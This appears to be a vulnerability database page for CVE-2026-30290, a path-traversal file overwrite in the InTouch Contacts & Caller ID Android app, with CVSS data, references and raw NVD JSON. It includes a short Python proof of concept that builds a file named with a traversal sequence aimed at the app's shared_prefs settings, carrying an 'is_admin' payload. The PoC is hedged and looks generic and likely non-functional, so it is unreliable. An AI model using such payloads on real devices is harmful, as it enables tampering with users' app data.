CVE-2026-30290

Description

An arbitrary file overwrite vulnerability in InTouch Contacts & Caller ID APP v6.38.1 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intouchapp:intouch_contacts_\&_caller_id:6.38.1:*:*:*:*:android:*:* - VULNERABLE

InTouch Contacts & Caller ID APP v6.38.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os

# PoC for CVE-2026-30290: Arbitrary File Overwrite via File Import
# Description: This script generates a malicious file intended to overwrite
# a critical internal file via path traversal when imported by the vulnerable app.

def generate_poc():
    # Define the target internal file path using path traversal sequences
    # Note: The actual path depends on the app's data directory structure.
    traversal_sequence = "../../../data/data/com.intouch.app/shared_prefs/settings.xml"
    
    # Malicious content to be written (e.g., enabling admin privileges)
    payload = "<boolean name='is_admin' value='true'/>"
    
    # Create a file with the traversal sequence in the name or content
    # Depending on the specific implementation details of the import function.
    poc_filename = f"contacts_backup_{traversal_sequence}.xml"
    
    with open(poc_filename, 'w') as f:
        f.write(payload)
        
    print(f"[+] PoC file generated: {poc_filename}")
    print(f"[+] Attempting to overwrite: {traversal_sequence}")
    print("[+] Upload this file to the device and import it via InTouch App.")

if __name__ == "__main__":
    generate_poc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30290
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30290
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30290/
[4] VulDB https://vuldb.com/cve/CVE-2026-30290
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/19
[6] https://secsys.fudan.edu.cn/
[7] https://www.intouchapp.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30290", "sourceIdentifier": "[email protected]", "published": "2026-03-31T20:16:26.670", "lastModified": "2026-04-07T16:11:04.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in InTouch Contacts & Caller ID APP v6.38.1 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intouchapp:intouch_contacts_\\&_caller_id:6.38.1:*:*:*:*:android:*:*", "matchCriteriaId": "CC5EECA3-F5B4-4A89-947D-3C61F3BAE4B3"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/19", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.intouchapp.com/", "source": "[email protected]", "tags": ["Product"]}]}}